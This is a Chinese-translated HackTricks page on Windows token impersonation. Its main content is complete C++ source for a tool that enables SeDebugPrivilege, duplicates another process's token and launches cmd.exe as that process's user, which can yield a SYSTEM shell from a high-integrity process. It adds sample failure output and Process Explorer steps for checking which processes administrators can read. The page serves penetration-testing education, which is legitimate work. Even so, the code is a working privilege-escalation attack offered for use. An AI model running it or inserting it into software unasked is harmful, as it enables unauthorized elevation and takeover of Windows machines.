mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
203 lines
8 KiB
Markdown
203 lines
8 KiB
Markdown
<details>
|
||
|
||
<summary><strong>零基础学习AWS黑客攻击到高手</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||
|
||
支持HackTricks的其他方式:
|
||
|
||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||
|
||
</details>
|
||
|
||
|
||
## 代码
|
||
|
||
以下代码来自[这里](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。它允许**指定一个进程ID作为参数**,并且作为指定进程用户的CMD将被运行。\
|
||
在高完整性进程中,您可以**指定一个作为系统运行的进程的PID**(如winlogon, wininit),并以系统身份执行cmd.exe。
|
||
```cpp
|
||
impersonateuser.exe 1234
|
||
```
|
||
```cpp
|
||
// impersonateuser.cpp 的内容保持不变
|
||
```
|
||
```cpp
|
||
#include <windows.h>
|
||
#include <iostream>
|
||
#include <Lmcons.h>
|
||
BOOL SetPrivilege(
|
||
HANDLE hToken, // access token handle
|
||
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
|
||
BOOL bEnablePrivilege // to enable or disable privilege
|
||
)
|
||
{
|
||
TOKEN_PRIVILEGES tp;
|
||
LUID luid;
|
||
if (!LookupPrivilegeValue(
|
||
NULL, // lookup privilege on local system
|
||
lpszPrivilege, // privilege to lookup
|
||
&luid)) // receives LUID of privilege
|
||
{
|
||
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
|
||
return FALSE;
|
||
}
|
||
tp.PrivilegeCount = 1;
|
||
tp.Privileges[0].Luid = luid;
|
||
if (bEnablePrivilege)
|
||
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||
else
|
||
tp.Privileges[0].Attributes = 0;
|
||
// Enable the privilege or disable all privileges.
|
||
if (!AdjustTokenPrivileges(
|
||
hToken,
|
||
FALSE,
|
||
&tp,
|
||
sizeof(TOKEN_PRIVILEGES),
|
||
(PTOKEN_PRIVILEGES)NULL,
|
||
(PDWORD)NULL))
|
||
{
|
||
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
|
||
return FALSE;
|
||
}
|
||
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
|
||
{
|
||
printf("[-] The token does not have the specified privilege. \n");
|
||
return FALSE;
|
||
}
|
||
return TRUE;
|
||
}
|
||
std::string get_username()
|
||
{
|
||
TCHAR username[UNLEN + 1];
|
||
DWORD username_len = UNLEN + 1;
|
||
GetUserName(username, &username_len);
|
||
std::wstring username_w(username);
|
||
std::string username_s(username_w.begin(), username_w.end());
|
||
return username_s;
|
||
}
|
||
int main(int argc, char** argv) {
|
||
// Print whoami to compare to thread later
|
||
printf("[+] Current user is: %s\n", (get_username()).c_str());
|
||
// Grab PID from command line argument
|
||
char* pid_c = argv[1];
|
||
DWORD PID_TO_IMPERSONATE = atoi(pid_c);
|
||
// Initialize variables and structures
|
||
HANDLE tokenHandle = NULL;
|
||
HANDLE duplicateTokenHandle = NULL;
|
||
STARTUPINFO startupInfo;
|
||
PROCESS_INFORMATION processInformation;
|
||
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
|
||
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
|
||
startupInfo.cb = sizeof(STARTUPINFO);
|
||
// Add SE debug privilege
|
||
HANDLE currentTokenHandle = NULL;
|
||
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, ¤tTokenHandle);
|
||
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
|
||
{
|
||
printf("[+] SeDebugPrivilege enabled!\n");
|
||
}
|
||
// Call OpenProcess(), print return code and error code
|
||
HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
|
||
if (GetLastError() == NULL)
|
||
printf("[+] OpenProcess() success!\n");
|
||
else
|
||
{
|
||
printf("[-] OpenProcess() Return Code: %i\n", processHandle);
|
||
printf("[-] OpenProcess() Error: %i\n", GetLastError());
|
||
}
|
||
// Call OpenProcessToken(), print return code and error code
|
||
BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
|
||
if (GetLastError() == NULL)
|
||
printf("[+] OpenProcessToken() success!\n");
|
||
else
|
||
{
|
||
printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
|
||
printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
|
||
}
|
||
// Impersonate user in a thread
|
||
BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
|
||
if (GetLastError() == NULL)
|
||
{
|
||
printf("[+] ImpersonatedLoggedOnUser() success!\n");
|
||
printf("[+] Current user is: %s\n", (get_username()).c_str());
|
||
printf("[+] Reverting thread to original user context\n");
|
||
RevertToSelf();
|
||
}
|
||
else
|
||
{
|
||
printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
|
||
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
|
||
}
|
||
// Call DuplicateTokenEx(), print return code and error code
|
||
BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
|
||
if (GetLastError() == NULL)
|
||
printf("[+] DuplicateTokenEx() success!\n");
|
||
else
|
||
{
|
||
printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
|
||
printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
|
||
}
|
||
// Call CreateProcessWithTokenW(), print return code and error code
|
||
BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
|
||
if (GetLastError() == NULL)
|
||
printf("[+] Process spawned!\n");
|
||
else
|
||
{
|
||
printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
|
||
printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
|
||
}
|
||
return 0;
|
||
}
|
||
```
|
||
{% endcode %}
|
||
|
||
## 错误
|
||
|
||
在某些情况下,您可能尝试模拟 System 但它不起作用,显示如下输出:
|
||
```cpp
|
||
[+] OpenProcess() success!
|
||
[+] OpenProcessToken() success!
|
||
[-] ImpersonatedLoggedOnUser() Return Code: 1
|
||
[-] ImpersonatedLoggedOnUser() Error: 5
|
||
[-] DuplicateTokenEx() Return Code: 0
|
||
[-] DupicateTokenEx() Error: 5
|
||
[-] CreateProcessWithTokenW Return Code: 0
|
||
[-] CreateProcessWithTokenW Error: 1326
|
||
```
|
||
这意味着即使你在高完整性级别上运行**你也没有足够的权限**。\
|
||
让我们用**进程资源管理器**检查当前管理员对`svchost.exe`进程的权限(你也可以使用进程黑客):
|
||
|
||
1. 选择一个`svchost.exe`的进程
|
||
2. 右键点击 --> 属性
|
||
3. 在"安全"标签页中,点击右下角的"权限"按钮
|
||
4. 点击"高级"
|
||
5. 选择"管理员"然后点击"编辑"
|
||
6. 点击"显示高级权限"
|
||
|
||
.png>)
|
||
|
||
上图包含了"管理员"对选定进程的所有权限(如你所见,在`svchost.exe`的情况下,他们只有"查询"权限)
|
||
|
||
看看"管理员"对`winlogon.exe`的权限:
|
||
|
||
.png>)
|
||
|
||
在该进程内部,"管理员"可以"读取内存"和"读取权限",这可能允许管理员模拟该进程使用的令牌。
|
||
|
||
|
||
|
||
<details>
|
||
|
||
<summary><strong>从零到英雄学习AWS黑客攻击,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||
|
||
支持HackTricks的其他方式:
|
||
|
||
* 如果你想在**HackTricks中看到你的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。
|
||
|
||
</details>
|